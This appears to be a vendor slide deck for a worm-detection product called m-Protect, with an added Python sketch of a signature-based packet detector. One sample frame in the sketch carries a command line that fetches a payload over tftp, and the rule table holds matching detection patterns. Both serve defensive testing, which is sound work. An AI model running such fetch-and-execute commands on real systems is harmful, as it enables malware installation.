jEnterprise Suite For Network Monitoring and Security

Dr. Sureswaran Ramadass, Dr. Rahmat Budiarto, Mr. Ahmad Manasrah, Mr. M. F. Pasha
Agenda
• Problem statement
• What is a worm?
• Worm damage effects
• Cost of worms
• Solution
• Technology
The Problem
• Networks nowadays suffer from:
  - Viruses, worms
  - Trojans, spyware
  - Adware, hijackers, pop-up generators
  - Spam, intrusions and many more
• If you are connected to the Internet (home or corporate), your machine is exposed to the whole Internet world, and hence vulnerable to worms and viruses.
• Viruses and worms are the biggest contributors to today's network problems. A firewall and antivirus alone are therefore not enough to protect your organization from blended threats.
What is a Worm?

Worms are programs that replicate themselves from system to system without the use of a host file. Unlike a virus, a worm needs no user action such as opening an infected file: it spreads on its own, typically by exploiting a network service or by mailing itself.

Some worms do travel inside other files, often Word or Excel documents. Such a macro worm releases a document that already has the "worm" macro inside it; the entire document travels from computer to computer, so the entire document should be considered the worm.

W32.Mydoom.AX@mm is an example of a worm (the @mm suffix in this naming scheme marks a mass-mailing worm).
Worm Damage Effects
Once a host is infected, worms can:
• Steal YOUR private information and distribute it to every address in your email database.
• Send dummy traffic to paralyze your network.
• Destroy key system files, damaging and crashing your computer.
• Destroy the database system on your server.
• Irrecoverably overwrite your personal files.
• Slow down your PC.
Cost of Worms

Worldwide cleanup cost of worms:
• Sobig: USD 37.1 billion
• MyDoom: USD 22.6 billion
• Klez: USD 19.8 billion
• Nachi: USD 13 billion
• Mimail: USD 11.5 billion
• Swen: USD 10.4 billion
• Love Bug: USD 8.8 billion
• Bugbear: USD 3.9 billion

Source: www.wholesecurity.com
Cost of Worms…

Cleanup cost of worms in Malaysia:
• Code Red: RM 22 million
• Nimda: RM 22 million
• Blaster: RM 31 million
• Nachi: RM 31 million

90% of desktop computers in a Malaysian Internet company experienced downtime caused by the Blaster.D worm (August 2003).
Source: NISER study
What Do You Need?

• A holistic review of the security strategies you currently have in place MUST be adopted to protect your organization from the new generation of blended threats.
• A solution that covers the loopholes left by other security products for all-round protection, able to detect internal worm attacks as well as external ones.
• Software with up-to-date worm signatures, armed with a warning and alerting mechanism that makes the security team aware so they can take the proper action.
• Advice and recommendations.
What Do You Need?
The answer is m-Protect!

• Easy to install and use.
• Low memory requirements.
• Detects worm activity on the wire.
• Live updates from the m-Protect database server, which holds a comprehensive list of all known worms.
• Works passively, scanning network traffic for worms.
• Alerts you to a potential worm attack via synthesized voice warnings and visual messages, as well as SMS and email.
• Pinpoints the computer that is broadcasting the worm packets.
• Works hand in hand with third-party antivirus tools.
• Able to detect worms with multiple signatures.
• Detects inside and outside worm attacks.
Why m-Protect?

m-Protect alerts everyone on the network about the worm attack, then:
• Locates the source of the problem.
• Provides possible solutions.

Besides propagation via the Internet connection, worms can still reach the internal network by:
• laptops;
• external media (CDs, thumb drives);
• wireless access points;
• encrypted or zipped emails.

Border defenses are of no use if the worm is already inside the internal network.
m-Protect in action
[Diagram: an infected PC inside your LAN, behind the border firewall, raises WARNING indicators; an unprotected PC is infected in turn and originates the attack again, raising ALERT indicators.]
m-Protect in action…
• Computers without sufficient antivirus protection or patches will be infected.
• Such computers create unwanted traffic in their attempts to infect others.
• All network users then experience a "network outage".
Technology-Modules
Technology-Framework
[Detection flowchart, reconstructed from the slide:]
• Capturing: the Packet Provider hands each captured frame to the engine.
• IP packet? No: continue monitoring. Yes: apply rule.
• Suspicious SRC & DST port numbers? No: continue monitoring. Yes: load detection rule.
• Rule matched? No: get next rule (and continue monitoring when no rules remain). Yes: display worm info and trigger alert.
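The following Python sketch is an added example, not m-Protect code or any part of the jEnterprise Suite. It implements the flowchart above in plain code (capture, IP check, suspicious-port check, rule matching, alert) and also exercises the feature list from the "What Do You Need?" slide: detecting worm activity on the wire with multi-pattern signatures, pinpointing the source host by MAC and IP, and classifying an attack as inside or outside the LAN. Everything in it is constructed for the demo: the rule table, the payload markers, the MAC and IP addresses, the LAN prefix 192.168.1.0/24 and the sample frames. TCP 135/4444 (Blaster) and 3127 (Mydoom backdoor) are publicly documented ports and 05 00 0b is the DCE/RPC v5 bind header prefix, but the byte patterns are placeholders, not real worm signatures.

```python
import ipaddress
import struct
from collections import Counter
from typing import NamedTuple, Optional, Tuple

ETH_P_IP = 0x0800
LAN = ipaddress.ip_network("192.168.1.0/24")  # assumed internal prefix (constructed for the demo)


class Rule(NamedTuple):
    name: str
    dst_ports: Tuple[int, ...]           # destination ports that make a packet "suspicious"
    patterns: Tuple[bytes, ...]          # payload patterns that must ALL be present (multi-signature)
    src_ports: Tuple[int, ...] = ()      # optional source-port constraint; () means any


# Hypothetical rule table. TCP 135/4444 (Blaster) and 3127 (Mydoom backdoor) are publicly
# documented ports and b"\x05\x00\x0b" is a DCE/RPC v5 bind header; the other byte strings
# are placeholders constructed for this demo, NOT real worm signatures.
RULES = (
    Rule("Blaster-like RPC/DCOM probe", (135,), (b"\x05\x00\x0b", b"WORM-DEMO-1")),
    Rule("Blaster-like backdoor shell", (4444,), (b"tftp",)),
    Rule("Mydoom-like backdoor", (3127,), (b"DEMO-MYDOOM-MARK",)),
)


def parse_frame(frame: bytes) -> Optional[dict]:
    """Parse Ethernet II + IPv4 (+TCP/UDP); None for non-IP or truncated frames."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETH_P_IP:
        return None  # the "IP packet? -> No" branch: continue monitoring
    ip = frame[14:]
    ihl, total_len = (ip[0] & 0x0F) * 4, struct.unpack("!H", ip[2:4])[0]
    if ip[0] >> 4 != 4 or ihl < 20 or total_len < ihl or len(ip) < total_len:
        return None
    proto, l4 = ip[9], ip[ihl:total_len]
    pkt = {"src_mac": ":".join(f"{b:02x}" for b in frame[6:12]), "proto": proto,
           "src_port": None, "dst_port": None, "payload": l4,
           "src_ip": str(ipaddress.IPv4Address(ip[12:16])),
           "dst_ip": str(ipaddress.IPv4Address(ip[16:20]))}
    if proto == 6 and len(l4) >= 20:    # TCP: ports, then data offset from header byte 12
        pkt["src_port"], pkt["dst_port"] = struct.unpack("!HH", l4[:4])
        pkt["payload"] = l4[(l4[12] >> 4) * 4:]
    elif proto == 17 and len(l4) >= 8:  # UDP: fixed 8-byte header
        pkt["src_port"], pkt["dst_port"] = struct.unpack("!HH", l4[:4])
        pkt["payload"] = l4[8:]
    return pkt


def inspect(frame: bytes) -> Optional[dict]:
    """Run one frame through the flowchart; return an alert dict, or None to keep monitoring."""
    pkt = parse_frame(frame)
    if pkt is None or pkt["dst_port"] is None:
        return None
    for rule in RULES:
        if pkt["dst_port"] not in rule.dst_ports or (rule.src_ports and pkt["src_port"] not in rule.src_ports):
            continue  # ports not suspicious for this rule: get next rule
        if all(p in pkt["payload"] for p in rule.patterns):  # every signature must match
            origin = "inside" if ipaddress.ip_address(pkt["src_ip"]) in LAN else "outside"
            return {"rule": rule.name, "src_ip": pkt["src_ip"], "src_mac": pkt["src_mac"],
                    "dst_ip": pkt["dst_ip"], "dst_port": pkt["dst_port"], "origin": origin}
    return None


def monitor(frames) -> list:
    """Passive loop over captured frames; collects every alert."""
    return [a for a in map(inspect, frames) if a is not None]


def pinpoint_source(alerts) -> list:
    """Rank alerting source IPs by alert count; the top entry is the likely infected host."""
    return Counter(a["src_ip"] for a in alerts).most_common()


def build_tcp_frame(src_mac: bytes, src_ip: str, dst_ip: str,
                    src_port: int, dst_port: int, payload: bytes) -> bytes:
    """Build a minimal Ethernet/IPv4/TCP frame (checksums left zero; fine for offline parsing)."""
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     ipaddress.IPv4Address(src_ip).packed, ipaddress.IPv4Address(dst_ip).packed)
    return b"\xff" * 6 + src_mac + struct.pack("!H", ETH_P_IP) + ip + tcp


# Constructed sample capture: all addresses and payloads are made up for the demo.
INFECTED_MAC = bytes.fromhex("0a0000000003")
SAMPLE_FRAMES = [
    b"\xff" * 6 + bytes.fromhex("0a0000000001") + b"\x08\x06" + b"\x00" * 28,  # ARP: not IP
    build_tcp_frame(bytes.fromhex("0a0000000002"), "192.168.1.20", "203.0.113.10",
                    50000, 80, b"GET / HTTP/1.1\r\n"),  # benign web request
    build_tcp_frame(INFECTED_MAC, "192.168.1.77", "192.168.1.20", 1030, 135,
                    b"\x05\x00\x0b\x03\x10\x00\x00\x00" + b"WORM-DEMO-1"),  # internal host probing RPC
    build_tcp_frame(INFECTED_MAC, "192.168.1.77", "192.168.1.21", 1031, 4444,
                    b"tftp -i 192.168.1.77 GET payload.exe\r\n"),  # same host, backdoor shell
    build_tcp_frame(bytes.fromhex("0a0000000002"), "192.168.1.20", "192.168.1.30", 1040, 135,
                    b"\x05\x00\x0b\x03legit"),  # suspicious port, but only one of the two patterns
    build_tcp_frame(bytes.fromhex("0a0000000009"), "198.51.100.5", "192.168.1.20", 40000, 3127,
                    b"DEMO-MYDOOM-MARK"),  # attack arriving from outside the LAN
]

if __name__ == "__main__":
    found = monitor(SAMPLE_FRAMES)
    for a in found:
        print(f"ALERT {a['rule']}: {a['src_ip']} ({a['src_mac']}, {a['origin']}) -> {a['dst_ip']}:{a['dst_port']}")
    print("Likely infected host:", pinpoint_source(found)[0])
```

Run against the constructed capture, the engine ignores the ARP frame and the benign HTTP request, passes over the port-135 frame that carries only one of the rule's two patterns, and raises three alerts: two from the internal host 192.168.1.77 (origin "inside") and one from 198.51.100.5 on port 3127 (origin "outside"), so pinpoint_source() names 192.168.1.77 as the host to isolate. In a real deployment the frames would come from a promiscuous-mode capture (the slide's Packet Provider) rather than a list, and the rule table would be refreshed from a signature feed; ICMP-only worms such as Nachi's ping sweep would need an ICMP branch, which this sketch deliberately leaves out.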
Technology- Enterprise
The Product…
Thank You
Q&A